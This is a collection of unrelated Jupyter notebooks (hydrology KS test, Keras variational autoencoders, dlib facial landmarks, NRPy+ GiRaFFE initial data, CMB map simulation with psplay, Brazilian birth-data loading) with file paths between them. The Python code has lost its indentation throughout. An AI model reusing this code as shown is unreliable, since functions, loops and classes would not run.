_alpha = [0.2, 0.15, 0.1, 0.07, 0.05, 0.01]
for _source in source_test:
print(f'Dcr {_source:<12}=', calc_dcr(_alpha, _n, source=_source))
# + [markdown] id="pMaqh10eg97J"
# ## Fungsi `kstest(df, ...)`
#
# Function: `kstest(df, col=None, dist='normal', source_dist='scipy', alpha=0.05, source_dcr='scipy', show_stat=True, report='result')`
#
# Fungsi `kstest(...)` merupakan fungsi untuk melakukan uji kolmogorov-smirnov terhadap distribusi yang dibandingkan. Fungsi ini mengeluarkan objek `pandas.DataFrame`.
#
# - Argumen Posisi:
# - `df`: `pandas.DataFrame`.
# - Argumen Opsional:
# - `col`: nama kolom, `None` (default). Jika tidak diisi menggunakan kolom pertama dalam `df` sebagai data masukan.
# - `dist`: distribusi yang dibandingkan, `'normal'` (distribusi normal) (default). Distribusi yang dapat digunakan antara lain: Log Normal (`'lognormal'`), Gumbel (`'gumbel'`), Log Pearson 3 (`'logpearson3'`).
# - `source_dist`: sumber perhitungan distribusi, `'scipy'` (default). Lihat masing-masing modul analisis frekuensi untuk lebih jelasnya.
# - `alpha`: nilai $\alpha$, `0.05` (default).
# - `source_dcr`: sumber nilai Dcr, `'scipy'` (default). Sumber yang dapat digunakan antara lain: Soetopo (`'soetopo'`), Soewarno (`'soewarno'`).
# - `show_stat`: menampilkan hasil luaran uji, `True` (default).
# - `report`: opsi kolom luaran dataframe, `'result'` (default). Untuk melihat kolom perhitungan yang lainnya gunakan `'full'`.
# + colab={"base_uri": "https://localhost:8080/", "height": 464} id="eJUJM8fvAqAz" outputId="96aba277-f1b7-40ba-e311-d914189e4a6e"
kstest(data)
# + colab={"base_uri": "https://localhost:8080/"} id="5ReL3Yc4WX7Y" outputId="e5139a10-17f2-4a1b-cb1a-ca81c7bc7cd7"
kstest(data, dist='gumbel', source_dist='soetopo');
# + colab={"base_uri": "https://localhost:8080/", "height": 464} id="53Y_niHxWaIX" outputId="8a4b6c0c-4d0c-4f0a-8139-4ecc115471b2"
kstest(data, dist='logpearson3', alpha=0.2, source_dcr='soetopo', report='full')
# + [markdown] id="wOWoCwSek9JG"
# # Changelog
#
# ```
# - 20220316 - 1.0.0 - Initial
# ```
#
# #### Copyright © 2022 [<NAME>](https://taruma.github.io)
#
# Source code in this notebook is licensed under a [MIT License](https://choosealicense.com/licenses/mit/). Data in this notebook is licensed under a [Creative Common Attribution 4.0 International](https://creativecommons.org/licenses/by/4.0/).
#
| booklet_hidrokit/0.4.0/ipynb/manual/taruma_0_4_0_hk140_kolmogorov_smirnov.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
from keras.layers import Input, Dense, Lambda
from keras.layers.merge import concatenate as concat
from keras.models import Model
from keras import backend as K
from keras.datasets import mnist
from keras.utils import to_categorical
from keras.callbacks import EarlyStopping
from keras.optimizers import Adam
from io import BytesIO
import PIL
from IPython.display import clear_output, Image, display, HTML
# +
def prepare(images, labels):
images = images.astype('float32') / 255
n, w, h = images.shape
return images.reshape((n, w * h)), to_categorical(labels)
train, test = mnist.load_data()
x_train, y_train = prepare(*train)
x_test, y_test = prepare(*test)
img_width, img_height = train[0].shape[1:]
# +
batch_size = 250
latent_space_depth = 2
def sample_z(args):
z_mean, z_log_var = args
eps = K.random_normal(shape=(batch_size, latent_space_depth), mean=0., stddev=1.)
return z_mean + K.exp(z_log_var / 2) * eps
# +
def VariationalAutoEncoder(num_pixels):
pixels = Input(shape=(num_pixels,))
encoder_hidden = Dense(512, activation='relu')(pixels)
z_mean = Dense(latent_space_depth, activation='linear')(encoder_hidden)
z_log_var = Dense(latent_space_depth, activation='linear')(encoder_hidden)
def KL_loss(y_true, y_pred):
return(0.5 * K.sum(K.exp(z_log_var) + K.square(z_mean) - 1 - z_log_var, axis=1))
def reconstruction_loss(y_true, y_pred):
return K.sum(K.binary_crossentropy(y_true, y_pred), axis=-1)
def total_loss(y_true, y_pred):
return KL_loss(y_true, y_pred) + reconstruction_loss(y_true, y_pred)
z = Lambda(sample_z, output_shape=(latent_space_depth, ))([z_mean, z_log_var])
decoder_hidden = Dense(512, activation='relu')
reconstruct_pixels = Dense(num_pixels, activation='sigmoid')
decoder_in = Input(shape=(latent_space_depth,))
hidden = decoder_hidden(decoder_in)
decoder_out = reconstruct_pixels(hidden)
decoder = Model(decoder_in, decoder_out)
hidden = decoder_hidden(z)
outputs = reconstruct_pixels(hidden)
auto_encoder = Model(pixels, outputs)
auto_encoder.compile(optimizer=Adam(lr=0.001),
loss=total_loss,
metrics=[KL_loss, reconstruction_loss])
return auto_encoder, decoder
auto_encoder, decoder = VariationalAutoEncoder(x_train.shape[1])
auto_encoder.summary()
# -
x_train.shape, y_train.shape, x_test.shape, y_test.shape
auto_encoder.fit(x_train, x_train, verbose=1,
batch_size=batch_size, epochs=100,
validation_data=(x_test, x_test))
# +
random_number = np.asarray([[np.random.normal()
for _ in range(latent_space_depth)]])
def decode_img(a):
a = np.clip(a * 256, 0, 255).astype('uint8')
return PIL.Image.fromarray(a)
decode_img(decoder.predict(random_number).reshape(img_width, img_height)).resize((56, 56))
# +
num_cells = 10
overview = PIL.Image.new('RGB',
(num_cells * (img_width + 4) + 8,
num_cells * (img_height + 4) + 8),
(128, 128, 128))
vec = np.zeros((1, latent_space_depth))
for x in range(num_cells):
vec[:, 0] = (x * 3) / (num_cells - 1) - 1.5
for y in range(num_cells):
vec[:, 1] = (y * 3) / (num_cells - 1) - 1.5
decoded = decoder.predict(vec)
img = decode_img(decoded.reshape(img_width, img_height))
overview.paste(img, (x * (img_width + 4) + 6, y * (img_height + 4) + 6))
overview
# +
def ConditionalVariationalAutoEncoder(num_pixels, num_labels):
pixels = Input(shape=(num_pixels,))
label = Input(shape=(num_labels,), name='label')
inputs = concat([pixels, label], name='inputs')
encoder_hidden = Dense(512, activation='relu', name='encoder_hidden')(inputs)
z_mean = Dense(latent_space_depth, activation='linear')(encoder_hidden)
z_log_var = Dense(latent_space_depth, activation='linear')(encoder_hidden)
def KL_loss(y_true, y_pred):
return(0.5 * K.sum(K.exp(z_log_var) + K.square(z_mean) - 1 - z_log_var, axis=1))
def reconstruction_loss(y_true, y_pred):
return K.sum(K.binary_crossentropy(y_true, y_pred), axis=-1)
def total_loss(y_true, y_pred):
return KL_loss(y_true, y_pred) + reconstruction_loss(y_true, y_pred)
z = Lambda(sample_z, output_shape=(latent_space_depth, ))([z_mean, z_log_var])
zc = concat([z, label])
decoder_hidden = Dense(512, activation='relu')
reconstruct_pixels = Dense(num_pixels, activation='sigmoid')
decoder_in = Input(shape=(latent_space_depth + num_labels,))
hidden = decoder_hidden(decoder_in)
decoder_out = reconstruct_pixels(hidden)
decoder = Model(decoder_in, decoder_out)
hidden = decoder_hidden(zc)
outputs = reconstruct_pixels(hidden)
auto_encoder = Model([pixels, label], outputs)
auto_encoder.compile(optimizer=Adam(lr=0.001),
loss=total_loss,
metrics=[KL_loss, reconstruction_loss])
return auto_encoder, decoder
cond_auto_encoder, cond_decoder = ConditionalVariationalAutoEncoder(x_train.shape[1], y_train.shape[1])
cond_auto_encoder.summary()
# -
cond_auto_encoder.fit([x_train, y_train], x_train, verbose=1,
batch_size=batch_size, epochs=50,
validation_data = ([x_test, y_test], x_test))
number_4 = np.zeros((1, latent_space_depth + y_train.shape[1]))
number_4[:, 4 + latent_space_depth] = 1
decode_img(cond_decoder.predict(number_4).reshape(
img_width, img_height)).resize((56, 56))
number_8_3 = np.zeros((1, latent_space_depth + y_train.shape[1]))
number_8_3[:, 8 + latent_space_depth] = 0.5
number_8_3[:, 3 + latent_space_depth] = 0.5
decode_img(cond_decoder.predict(number_8_3).reshape(
img_width, img_height)).resize((56, 56))
# +
digits = [3, 0, 8, 9]
num_cells = 10
overview = PIL.Image.new('RGB',
(num_cells * (img_width + 4) + 8,
num_cells * (img_height + 4) + 8),
(128, 128, 128))
vec = np.zeros((1, latent_space_depth + y_train.shape[1]))
for x in range(num_cells):
x1 = [x / (num_cells - 1), 1 - x / (num_cells - 1)]
for y in range(num_cells):
y1 = [y / (num_cells - 1), 1 - y / (num_cells - 1)]
for idx, dig in enumerate(digits):
vec[:, dig + latent_space_depth] = x1[idx % 2] * y1[idx // 2]
decoded = cond_decoder.predict(vec)
img = decode_img(decoded.reshape(img_width, img_height))
overview.paste(img, (x * (img_width + 4) + 6, y * (img_height + 4) + 6))
overview
# +
num_cells = 10
overview = PIL.Image.new('RGB',
(num_cells * (img_width + 4) + 8,
num_cells * (img_height + 4) + 8),
(128, 128, 128))
img_it = 0
vec = np.zeros((1, latent_space_depth + y_train.shape[1]))
for x in range(num_cells):
vec = np.zeros((1, latent_space_depth + y_train.shape[1]))
vec[:, x + latent_space_depth] = 1
for y in range(num_cells):
vec[:, 1] = 3 * y / (num_cells - 1) - 1.5
decoded = cond_decoder.predict(vec)
img = decode_img(decoded.reshape(img_width, img_height))
overview.paste(img, (x * (img_width + 4) + 6, y * (img_height + 4) + 6))
overview
# -
| 13.2 Variational Autoencoder.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# ## Facial Landmarks
-
# See blog post here - https://matthewearl.github.io/2015/07/28/switching-eds-with-python/
#
#
# #### Install Instructions for dlib
#
# - Download and Install Dlib
#
# https://sourceforge.net/projects/dclib/
#
# - Extract files in C:/dlib
# - Use command prompt to Cd to folder and run “python setup.py install”
#
# #### Download the pre-trained model here
#
# http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2
#
# - Place this file in your default ipython notebook folder
#
# +
import cv2
import dlib
import numpy
PREDICTOR_PATH = "shape_predictor_68_face_landmarks.dat"
predictor = dlib.shape_predictor(PREDICTOR_PATH)
detector = dlib.get_frontal_face_detector()
class TooManyFaces(Exception):
pass
class NoFaces(Exception):
pass
def get_landmarks(im):
rects = detector(im, 1)
if len(rects) > 1:
raise TooManyFaces
if len(rects) == 0:
raise NoFaces
return numpy.matrix([[p.x, p.y] for p in predictor(im, rects[0]).parts()])
def annotate_landmarks(im, landmarks):
im = im.copy()
for idx, point in enumerate(landmarks):
pos = (point[0, 0], point[0, 1])
cv2.putText(im, str(idx), pos,
fontFace=cv2.FONT_HERSHEY_SCRIPT_SIMPLEX,
fontScale=0.4,
color=(0, 0, 255))
cv2.circle(im, pos, 3, color=(0, 255, 255))
return im
image = cv2.imread('Obama.jpg')
landmarks = get_landmarks(image)
image_with_landmarks = annotate_landmarks(image, landmarks)
cv2.imshow('Result', image_with_landmarks)
cv2.imwrite('image_with_landmarks.jpg',image_with_landmarks)
cv2.waitKey(0)
cv2.destroyAllWindows()
# -
| LECTURES/Lecture 7.1 - Facial Landmarks.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <script async src="https://www.googletagmanager.com/gtag/js?id=UA-59152712-8"></script>
# <script>
# window.dataLayer = window.dataLayer || [];
# function gtag(){dataLayer.push(arguments);}
# gtag('js', new Date());
#
# gtag('config', 'UA-59152712-8');
# </script>
#
# # 1D Three Wave `GiRaFFEfood` Initial Data for `GiRaFFE`
#
# ## This module provides another initial data option for `GiRaFFE`, drawn from [this paper](https://arxiv.org/abs/1310.3274) .
#
# **Notebook Status:** <font color='green'><b> Validated </b></font>
#
# **Validation Notes:** This tutorial notebook has been confirmed to be self-consistent with its corresponding NRPy+ module, as documented [below](#code_validation). The initial data has validated against the original `GiRaFFE`, as documented [here](Tutorial-Start_to_Finish_UnitTest-GiRaFFEfood_NRPy.ipynb).
#
# ### NRPy+ Source Code for this module: [GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests_three_waves.py](../../edit/in_progress/GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests_three_waves.py)
#
# ## Introduction:
#
# ### Three waves:
#
# This is a flat-spacetime test representing three Alfvén waves (one stationary, one left-going, and one right-going) with initial data
# \begin{align}
# A_x &= 0 \\
# A_y &= 3.5x H(-x) + 3.0x H(x) \\
# A_z &= y - 1.5x H(-x) - 3.0x H(x),
# \end{align}
# where $H(x)$ is the Heaviside function, which generates the magnetic field
# $$\mathbf{B}(0,x) = \mathbf{B_a}(0,x) + \mathbf{B_+}(0,x) + \mathbf{B_-}(0,x)$$
# and uses the electric field
# $$\mathbf{E}(0,x) = \mathbf{E_a}(0,x) + \mathbf{E_+}(0,x) + \mathbf{E_-}(0,x),$$
# where subscripted $\mathbf{a}$ corresponds to the stationary wave, subscripted $\mathbf{+}$ corresponds to the right-going wave, and subscripted $\mathbf{-}$ corresponds to the left-going wave, and where
# \begin{align}
# \mathbf{B_a}(0,x) &= \left \{ \begin{array}{lll} (1.0,1.0,2.0) & \mbox{if} & x<0 \\
# (1.0,1.5,2.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_a}(0,x) &= \left \{ \begin{array}{lll} (-1.0,1.0,0.0) & \mbox{if} & x<0 \\
# (-1.5,1.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{B_+}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.0,0.0) & \mbox{if} & x<0 \\
# (0.0,1.5,1.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_+}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.0,0.0) & \mbox{if} & x<0 \\
# (0.0,1.0,-1.5) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{B_-}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.5,1.5) & \mbox{if} & x<0 \\
# (0.0,0.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_-}(0,x) &= \left \{ \begin{array}{lll} (0.0,-1.5,0.5) & \mbox{if} & x<0 \\
# (0.0,0.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. . \\
# \end{align}
#
# For the eventual purpose of testing convergence, any quantity $Q$ evolves as $Q(t,x) = Q_a(0,x) + Q_+(0,x-t) + Q_-(0,x+t)$.
#
# See the [Tutorial-GiRaFFEfood_NRPy_Exact_Wald](Tutorial-GiRaFFEfood_NRPy.ipynb) tutorial notebook for more general detail on how this is used.
#
# <a id='toc'></a>
#
# # Table of Contents:
# $$\label{toc}$$
#
# This notebook is organized as follows
#
# 1. [Step 1](#initializenrpy): Import core NRPy+ modules and set NRPy+ parameters
# 1. [Step 2](#vector_ak): Set the vector $A_k$
# 1. [Step 3](#vectors_for_velocity): Set the vectors $B^i$ and $E^i$ for the velocity
# 1. [Step 4](#vi): Calculate $v^i$
# 1. [Step 5](#code_validation): Code Validation against `GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests` NRPy+ module
# 1. [Step 6](#latex_pdf_output): Output this notebook to $\LaTeX$-formatted PDF file
# <a id='initializenrpy'></a>
#
# # Step 1: Import core NRPy+ modules and set NRPy+ parameters \[Back to [top](#toc)\]
# $$\label{initializenrpy}$$
#
# Here, we will import the NRPy+ core modules and set the reference metric to Cartesian, set commonly used NRPy+ parameters, and set C parameters that will be set from outside the code eventually generated from these expressions. We will also set up a parameter to determine what initial data is set up, although it won't do much yet.
# +
# Step 0: Add NRPy's directory to the path
# https://stackoverflow.com/questions/16780014/import-file-from-parent-directory
import os,sys
nrpy_dir_path = os.path.join("..")
if nrpy_dir_path not in sys.path:
sys.path.append(nrpy_dir_path)
# Step 0.a: Import the NRPy+ core modules and set the reference metric to Cartesian
import sympy as sp # SymPy: The Python computer algebra package upon which NRPy+ depends
import NRPy_param_funcs as par # NRPy+: Parameter interface
import indexedexp as ixp # NRPy+: Symbolic indexed expression (e.g., tensors, vectors, etc.) support
import reference_metric as rfm # NRPy+: Reference metric support
par.set_parval_from_str("reference_metric::CoordSystem","Cartesian")
rfm.reference_metric()
# Step 1a: Set commonly used parameters.
thismodule = "GiRaFFEfood_NRPy_1D"
# -
# ##### <a id='vector_ak'></a>
#
# # Step 2: Set the vector $A_k$ \[Back to [top](#toc)\]
# $$\label{vector_ak}$$
#
# The vector potential is given as
# \begin{align}
# A_x &= 0 \\
# A_y &= 3.5x H(-x) + 3.0x H(x) \\
# A_z &= y - 1.5x H(-x) - 3.0x H(x),
# \end{align}
#
# However, to take full advantage of NRPy+'s automated function generation capabilities, we want to write this without the `if` statements, replacing them with calls to `fabs()`. To do so, we will use the NRPy+ module `Min_Max_and_Piecewise_Expressions`.
# We'll use reference_metric.py to define x and y
x = rfm.xxCart[0]
y = rfm.xxCart[1]
# Now, we can define the vector potential. We will need to write the Heviside function without `if`s, which can easily be done with the module `Min_Max_and_Piecewise_Expressions`. We thus get
# $$H(x) = \frac{\max(0,x)}{x}.$$
# This implementation is, of course, undefined for $x=0$; this problem is easily solved by adding a very small number (called `TINYDOUBLE` in our implementation) to the denominator (see [Tutorial-Min_Max_and_Piecewise_Expressions](Tutorial-Min_Max_and_Piecewise_Expressions.ipynb) for details on how this works). This is, conveniently, the exact implementation of the `coord_greater_bound()` function!
#
# \begin{align}
# A_x &= 0 \\
# A_y &= 3.5x H(-x) + 3.0x H(x) \\
# A_z &= y - 1.5x H(-x) - 3.0x H(x),
# \end{align}
# +
AD = ixp.zerorank1(DIM=3)
import Min_Max_and_Piecewise_Expressions as noif
AD[0] = sp.sympify(0)
AD[1] = sp.Rational(7,2)*x*noif.coord_greater_bound(-x,0) + sp.sympify(3)*x*noif.coord_greater_bound(x,0)
AD[2] = y-sp.Rational(3,2)*x*noif.coord_greater_bound(-x,0) - sp.sympify(3)*x*noif.coord_greater_bound(x,0)
# -
# <a id='vectors_for_velocity'></a>
#
# # Step 3: Set the vectors $B^i$ and $E^i$ for the velocity \[Back to [top](#toc)\]
# $$\label{vectors_for_velocity}$$
#
# First, we will set the the three individual waves; we change all $<$ to $\leq$ to avoid unintented behavior at $x=0$:
# \begin{align}
# \mathbf{B_a}(0,x) &= \left \{ \begin{array}{lll} (1.0,1.0,2.0) & \mbox{if} & x \leq 0 \\
# (1.0,1.5,2.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_a}(0,x) &= \left \{ \begin{array}{lll} (-1.0,1.0,0.0) & \mbox{if} & x \leq 0 \\
# (-1.5,1.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{B_+}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.0,0.0) & \mbox{if} & x \leq 0 \\
# (0.0,1.5,1.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_+}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.0,0.0) & \mbox{if} & x \leq 0 \\
# (0.0,1.0,-1.5) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{B_-}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.5,1.5) & \mbox{if} & x \leq 0 \\
# (0.0,0.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_-}(0,x) &= \left \{ \begin{array}{lll} (0.0,-1.5,0.5) & \mbox{if} & x \leq 0 \\
# (0.0,0.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. . \\
# \end{align}
#
# +
B_aU = ixp.zerorank1(DIM=3)
E_aU = ixp.zerorank1(DIM=3)
B_pU = ixp.zerorank1(DIM=3)
E_pU = ixp.zerorank1(DIM=3)
B_mU = ixp.zerorank1(DIM=3)
E_mU = ixp.zerorank1(DIM=3)
B_aU[0] = sp.sympify(1)
B_aU[1] = noif.coord_leq_bound(x,0) * sp.sympify(1) + noif.coord_greater_bound(x,0) * sp.Rational(3,2)
B_aU[2] = sp.sympify(2)
E_aU[0] = noif.coord_leq_bound(x,0) * sp.sympify(-1) + noif.coord_greater_bound(x,0) * sp.Rational(-3,2)
E_aU[1] = sp.sympify(1)
E_aU[2] = sp.sympify(0)
B_pU[0] = sp.sympify(0)
B_pU[1] = noif.coord_leq_bound(x,0) * sp.sympify(0) + noif.coord_greater_bound(x,0) * sp.Rational(3,2)
B_pU[2] = noif.coord_leq_bound(x,0) * sp.sympify(0) + noif.coord_greater_bound(x,0) * sp.sympify(1)
E_pU[0] = sp.sympify(0)
E_pU[1] = noif.coord_leq_bound(x,0) * sp.sympify(0) + noif.coord_greater_bound(x,0) * sp.sympify(1)
E_pU[2] = noif.coord_leq_bound(x,0) * sp.sympify(0) + noif.coord_greater_bound(x,0) * sp.Rational(-3,2)
B_mU[0] = sp.sympify(0)
B_mU[1] = noif.coord_leq_bound(x,0) * sp.Rational(1,2) + noif.coord_greater_bound(x,0) * sp.sympify(0)
B_mU[2] = noif.coord_leq_bound(x,0) * sp.Rational(3,2) + noif.coord_greater_bound(x,0) * sp.sympify(0)
E_mU[0] = sp.sympify(0)
E_mU[1] = noif.coord_leq_bound(x,0) * sp.Rational(-3,2) + noif.coord_greater_bound(x,0) * sp.sympify(0)
E_mU[2] = noif.coord_leq_bound(x,0) * sp.Rational(1,2) + noif.coord_greater_bound(x,0) * sp.sympify(0)
# -
# Then, we can obtain the total expressions for the magnetic and electric fields by simply adding the three waves together:
# \begin{align}
# \mathbf{B}(0,x) &= \mathbf{B_a}(0,x) + \mathbf{B_+}(0,x) + \mathbf{B_-}(0,x) \\
# \mathbf{E}(0,x) &= \mathbf{E_a}(0,x) + \mathbf{E_+}(0,x) + \mathbf{E_-}(0,x)
# \end{align}
BU = ixp.zerorank1(DIM=3)
EU = ixp.zerorank1(DIM=3)
for i in range(3):
BU[i] = B_aU[i] + B_pU[i] + B_mU[i]
EU[i] = E_aU[i] + E_pU[i] + E_mU[i]
# <a id='vi'></a>
#
# # Step 4: Calculate $v^i$ \[Back to [top](#toc)\]
# $$\label{vi}$$
#
# Now, we calculate $$\mathbf{v} = \frac{\mathbf{E} \times \mathbf{B}}{B^2},$$ which is equivalent to $$v^i = [ijk] \frac{E^j B^k}{B^2},$$ where $[ijk]$ is the Levi-Civita symbol and $B^2 = \gamma_{ij} B^i B^j$ is a trivial dot product in flat space.
#
# +
LeviCivitaSymbolDDD = ixp.LeviCivitaSymbol_dim3_rank3()
B2 = sp.sympify(0)
for i in range(3):
# In flat spacetime, gamma_{ij} is just a Kronecker delta
B2 += BU[i]**2 # This is trivial to extend to curved spacetime
ValenciavU = ixp.zerorank1()
for i in range(3):
for j in range(3):
for k in range(3):
ValenciavU[i] += LeviCivitaSymbolDDD[i][j][k] * EU[j] * BU[k] / B2
# -
# <a id='code_validation'></a>
#
# # Step 5: Code Validation against `GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests` NRPy+ module \[Back to [top](#toc)\]
# $$\label{code_validation}$$
#
# Here, as a code validation check, we verify agreement in the SymPy expressions for the `GiRaFFE` Aligned Rotator initial data equations we intend to use between
# 1. this tutorial and
# 2. the NRPy+ [`GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests.py`](../edit/GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests.py) module.
#
#
# +
import GiRaFFEfood_NRPy.GiRaFFEfood_NRPy_1D_tests_three_waves as gfho
gfho.GiRaFFEfood_NRPy_1D_tests_three_waves()
def consistency_check(quantity1,quantity2,string):
if quantity1-quantity2==0:
print(string+" is in agreement!")
else:
print(string+" does not agree!")
sys.exit(1)
print("Consistency check between GiRaFFEfood_NRPy tutorial and NRPy+ module:")
for i in range(3):
consistency_check(ValenciavU[i],gfho.ValenciavU[i],"ValenciavU"+str(i))
consistency_check(AD[i],gfho.AD[i],"AD"+str(i))
# -
# <a id='latex_pdf_output'></a>
#
# # Step 6: Output this notebook to $\LaTeX$-formatted PDF file \[Back to [top](#toc)\]
# $$\label{latex_pdf_output}$$
#
# The following code cell converts this Jupyter notebook into a proper, clickable $\LaTeX$-formatted PDF file. After the cell is successfully run, the generated PDF may be found in the root NRPy+ tutorial directory, with filename
# [Tutorial-GiRaFFEfood_NRPy_1D_tests.pdf](Tutorial-GiRaFFEfood_NRPy_1D_tests.pdf) (Note that clicking on this link may not work; you may need to open the PDF file through another means.)
import cmdline_helper as cmd # NRPy+: Multi-platform Python command-line interface
cmd.output_Jupyter_notebook_to_LaTeXed_PDF("Tutorial-GiRaFFEfood_NRPy_1D_tests",location_of_template_file=os.path.join(".."))
| in_progress/Tutorial-GiRaFFEfood_NRPy_1D_tests-three_waves.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # From CMB simulations to power spectra analysis
#
# In this tutorial, we will show how to generate CMB simulations from theoritical $C_\ell$, produce the corresponding CMB map tiles and finally analyze them using `psplay`.
#
# ## CMB simulation
#
# Using the attached $C_\ell$ [file](bode_almost_wmap5_lmax_1e4_lensedCls_startAt2.dat), we will first generate simulations with `pspy` in `CAR` pixellisation.
# +
from pspy import so_map
ncomp= 3
ra0, ra1, dec0, dec1 = -30, 30, -30, 30
res = 0.5
template = so_map.car_template(ncomp, ra0, ra1, dec0, dec1, res)
cl_file = "bode_almost_wmap5_lmax_1e4_lensedCls_startAt2.dat"
cmb = template.synfast(cl_file)
# -
# Then, we make 2 splits out of it, each with $5$ µK.arcmin rms in temperature and $5\times\sqrt{2}$ µK.arcmin in polarisation
import numpy as np
nsplits = 2
splits = [cmb.copy() for i in range(nsplits)]
for i in range(nsplits):
noise = so_map.white_noise(cmb, rms_uKarcmin_T=5, rms_uKarcmin_pol=np.sqrt(2)*5)
splits[i].data += noise.data
# We finally write on disk the two corresponding `fits` files
for i in range(nsplits):
splits[i].write_map("split{}_IQU_CAR.fits".format(i))
# ## Generation of tile files
#
# We now have a total of 6 maps in `CAR` pixellisation we want to plot them into tile files. A tile file corresponds to a static `PNG` file representing a part of the sky at a given zoom level. To convert the maps, we will use a set of tools from `psplay`.
#
#
# ### Conversion to tile files
# You should get two files of ~ 1 Gb size. We should keep these files since we will use them later for the power spectra computation. Last step in the conversion process, we have to generate the different tiles
# +
from psplay import tools
for i in range(nsplits):
tools.car2tiles(input_file="split{}_IQU_car.fits".format(i),
output_dir="tiles/split{}_IQU_car.fits".format(i))
# -
# At the end of the process, we get a new directory `tiles` with two sub-directories `split0_IQU_car.fits` and `split1_IQU_car_fits`. Within these two directories we have 6 directories which names refer to the zoom level : the directory `-5` correspond to the smallest zoom whereas the directory `0` corresponds to the most precise tiles.
#
# ## Using `psplay` to visualize the maps
#
# Now that we have generated the different tiles, we can interactively see the maps with `psplay`. The configuration of `psplay` can be either done using a dictionary or more easily with a `yaml`file. Basically, the configuration file needs to know where the original `FITS` files and the tile files are located. Other options can be set but we won't enter into too much details for this tutorial.
#
# For the purpose of this tutorial we have already created the `yaml` [file](simulation_to_analysis.yml) associated to the files we have created so far. Here is a copy-paste of it
#
# ```yaml
# map:
# layers:
# - cmb:
# tags:
# splits:
# values: [0, 1]
# keybindings: [j, k]
#
# components:
# values: [0, 1, 2]
# keybindings: [c, v]
# substitutes: ["T", "Q", "U"]
#
# tile: files/tiles/split{splits}_IQU_car.fits/{z}/tile_{y}_{x}_{components}.png
# name: CMB simulation - split {splits} - {components}
#
# data:
# maps:
# - id: split0
# file: split0_IQU_car.fits
# - id: split1
# file: split1_IQU_car.fits
#
# theory_file: bode_almost_wmap5_lmax_1e4_lensedCls_startAt2.dat
#
# plot:
# lmax: 2000
# ```
#
# There are 3 sections related to the 3 main steps namely the map visualization, the spectra computation and the graphical representation of the spectra. The two first sections are mandatory. The `map` section corresponds to the tile files generated so far and can be dynamically expanded given different `tags`. Here for instance, we will built all the combination of split and component values. The tile and the name fields will be generated for each combination given the tag values. Dedicated keybindings can also be defined in order to switch between the different split and/or components.
#
# **The tricker part of this configuration is to set the path to tiles relatively to where your notebook/JupyterLab instance has been started**. We can't set an absolute path and so you have to make sure that your notebook has been initiated from the `examples` directory. Otherwise, you should change the path to tile files given that you have access to them from your JupyterLab instance. So make sure to initiate your JupyterLab session from a "top" directory.
#
# We can now create an instance of `psplay` application and show the different maps
from psplay import App
my_app = App("simulation_to_analysis.yml")
my_app.show_map()
# If we unzoom enough, we will see the $\pm$ 30° patch size. We can also switch between the different I, Q, U and split layers. There are other options like the colormap and color scale which one can play and see how things change.
#
# ## Selecting sub-patches and computing the corresponding power spectra
#
# Given the different map, we can now select patches by clicking on the square or the disk icons located just below the +/- zoom button. For instance, if we select a rectangle and another disk whose size are more or less the total size of our patch, we will get two surfaces of almost 3000 square degrees. Now we can ask `psplay` to compute the power spectra of both regions. Let's initiate the plot application
my_app.show_plot()
# We can now clik on the `Compute spectra` button and watch the log output by clicking on the `Logs` tab. Depending on your machine (mainly memory capacity), the process can be pretty long especially the transformation into spherical harmonics. It also depends of the size of your patches but within 1 or 2 minutes, we should get the final spectra for the different cross-correlation. For instance, we can switch between different combinations of spectra (TT, TE, EE,...).
#
# Finally, the `Configuration` tab offer different options like changing the $\ell_\mathrm{max}$ value of the method use for the computation.
| examples/car_simulation_to_analysis.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Importando as bibliotecas
import pandas as pd
# Informar ao matplotlib sobre graficos inline
# %matplotlib inline
# +
# Importando algumas colunas do arquivo
# 0- ano/mes 1- vaginal 2-cesario
#carregar o arquivo csv, com o separador, o codigo do doc, e as colunas que quero
df = pd.read_csv('sinasc122017.csv', sep=';', encoding='cp1252', usecols=[0, 1, 2, 3, 4])
